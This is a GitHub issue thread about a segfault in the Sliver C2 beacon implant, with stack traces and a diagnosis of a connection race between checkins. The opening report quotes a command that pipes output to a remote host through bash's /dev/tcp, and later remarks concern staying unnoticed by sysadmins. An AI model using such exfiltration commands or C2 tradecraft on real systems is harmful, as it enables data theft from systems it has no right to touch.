Beacon segfault after execute -o of long-running command
The command that was run, with some small changes and placeholders inserted:
execute -o bash -c '[command] > /dev/tcp/[IP]/[PORT]'
The command ([command]) completed successfully after ~20 minutes and the output was fully received on the destination server.
The beacon died - I assume after the command completed - and printed this:
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x793710]
goroutine 820 [running]:
HlBbwQNJ.(*WM4lpECc).Write(0x0, {0xc0001da040, 0x4, 0x40})
QJ07Wn7t.go:1 +0x70
etqB0NQJ.RCy7F1R7(0xc7c7c0?, 0xbd0e01?)
AV7I1Kkr.go:1 +0xc5
I3atTgSN.dLgVWFtm.func4(0xd54a80?)
qIjErSNA.go:1 +0x26
main.lG6ocYtX(0xc00009c370, {0xc000485fb8?, 0x5d52c5?, 0x0?})
Dpz62hcW.go:1 +0x9ce
main.rmCpWGhH.func2()
muvGUAl8.go:1 +0x67
created by main.rmCpWGhH
U3YS4zcG.go:2 +0x555
can you enable debug mode and send us the full stack trace
I ran execute -o bash -c 'sleep 120 && echo 123' and got:
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x775c27]
goroutine 20 [running]:
crypto/tls.(*Conn).Write(0x0, {0xc00040aa80, 0x4, 0x40})
/root/.sliver/go/src/crypto/tls/conn.go:1112 +0x67
github.com/bishopfox/sliver/implant/sliver/transports/mtls.WriteEnvelope(0x0, 0xc0004225a0)
/root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/implant/sliver/transports/mtls/mtls.go:94 +0x2a5
github.com/bishopfox/sliver/implant/sliver/transports.mtlsBeacon.func4(0xc0004225a0)
/root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/implant/sliver/transports/beacon.go:193 +0x3a
main.beaconMain(0xc00018c000, {0xc0c5a1e6d59535ea, 0x243971b8da, 0xf34fa0})
/root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/sliver.go:341 +0x1428
main.beaconMainLoop.func2()
/root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/sliver.go:196 +0x76
created by main.beaconMainLoop
/root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/sliver.go:194 +0x82a
I have no familiarity with golang, but reading the relevant bits here, adding more nil checks for conn in the mtls functions would at the very least have avoided crashing in this spot.
I see that the task handling per checkin is performed in a goroutine, is there a possible race condition occurring here where, if the execution of all tasks in a checkin's beaconMain thread exceeds the beacon interval, then the next checkin's beaconMain would overwrite the conn object with a new one, losing the first checkin's conn? And if the first checkin takes longer than the beacon interval + the next checkin's beaconMain runtime, then the next one would close the conn and cause the issue here?
@pb376 what version of Sliver are you running? I recall we fixed a similar issue a few days ago.
I built from source after that fix was merged into master.
I see that the task handling per checkin is performed in a goroutine, is there a possible race condition occurring here where, if the execution of all tasks in a checkin's beaconMain thread exceeds the beacon interval, then the next checkin's beaconMain would overwrite the conn object with a new one, losing the first checkin's conn? And if the first checkin takes longer than the beacon interval + the next checkin's beaconMain runtime, then the next one would close the conn and cause the issue here?
Looks to me like Close is called, which sets the conn object to nil, and a Send event is called afterwards on that nil object. At least that's what it looks like at a high level.
I think that's it, with the Close being called by the next checkin's beaconMain.
sliver (linux_debug) > execute -o sleep 55
[...]
[+] linux_debug completed task b07bd8bd
[...]
works fine, but
sliver (linux_debug) > reconfig -i 10s
[...]
sliver (linux_debug) > reconfig -j 1s
[...]
sliver (linux_debug) > execute -o sleep 30
segfaults
Some further confirmation, with the interval set to 10s and jitter 1s, I did:
sliver (linux_debug) > execute -o sleep 30
⚠️ Using --output in beacon mode, if the command blocks the task will never complete
[*] Tasked beacon linux_debug (75bd806e)
I watched the debug output to catch the beacon checkin and pull the tasks, then quickly did:
sliver (linux_debug) > execute -o sleep 60
⚠️ Using --output in beacon mode, if the command blocks the task will never complete
[*] Tasked beacon linux_debug (1081691d)
This time the subsequent checkin ran a sleep 60, so by the time the first checkin's sleep task completed the subsequent checkin had not yet finished its own tasks and closed conn, so the first checkin was able to finish successfully:
[+] linux_debug completed task 75bd806e
It then crashed about 60s later, as you'd expect here.
This could be fixed by adding a reference count for conn that Start/Close use, or by allowing each goroutine to maintain there own conn one way or another.
I've hit this issue a few more times since, most recently while trying to download a large file. I took another look and believe what I had posted above is the root cause. It seems that decoupling the connections from the beacon object and having each goroutine use its own connection would fix this and probably help avoid other forms of related future trouble, but I'm not sure how many other things would need to be modified to accommodate a change like this. This could however cause connections to stack if there are many long-running commands being executed, which could become increasingly noticeable to sysadmins, so some type of reference counting scheme may be instead preferable if that is truly a concern of the general userbase. The extent of my experience writing go is the single line I added in a PR here a few weeks back, so I'm unfortunately not in any position to try to help more here or test ideas out, at least yet.
I do find it slightly strange that I seem to be the only one hitting this issue (or at least reporting it) given that I find myself running into it relatively often while doing routine things, so I was wondering if this perhaps did not affect other protocols (I'm using mtls) or if there are some non-default settings I should be using in general that would also help avoid this (aside from beacon interval.)
I'll have to take a look, i'm not sure we can safely pass the connections to multiple goroutines without needing a variety of locks to prevent race conditions.
From a glance I think we're better off implementing a multiplexer using something like smux
Are there any plans to address this issue?
I'm getting the same issue, but with sideload on the latest commit.
Trace
2023/09/17 20:30:23 task_linux.go:119: Done, stderr:
2023/09/17 20:30:23 sliver.go:355: [beacon] task completed (id: -3036368544394556068)
2023/09/17 20:30:23 sliver.go:390: [beacon] all tasks completed, sending results to server
2023/09/17 20:30:23 sliver.go:244: [beacon] closing ...
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x7abe3b]
goroutine 33 [running]:
crypto/tls.(*Conn).Write(0x0, {0xc000140000, 0x4, 0x40})
crypto/tls/conn.go:1183 +0x5b
github.com/bishopfox/sliver/implant/sliver/transports/mtls.WriteEnvelope(0x0, 0xc0004c2180)
github.com/bishopfox/sliver/implant/sliver/transports/mtls/mtls.go:97 +0x2fb
github.com/bishopfox/sliver/implant/sliver/transports.mtlsBeacon.func4(0xc0004c2180)
github.com/bishopfox/sliver/implant/sliver/transports/beacon.go:193 +0x34
main.beaconMain(0xc0002a2000, {0xc13a040bf9da10c6, 0x3489f43475, 0x1243da0})
github.com/bishopfox/sliver/sliver.go:315 +0xf23
main.beaconMainLoop.func2()
github.com/bishopfox/sliver/sliver.go:206 +0x6a
created by main.beaconMainLoop in goroutine 1
github.com/bishopfox/sliver/sliver.go:204 +0x865
I'm honestly surprised there aren't more reports related to this. The issue is pretty much in the fundamental design of the concurrency model.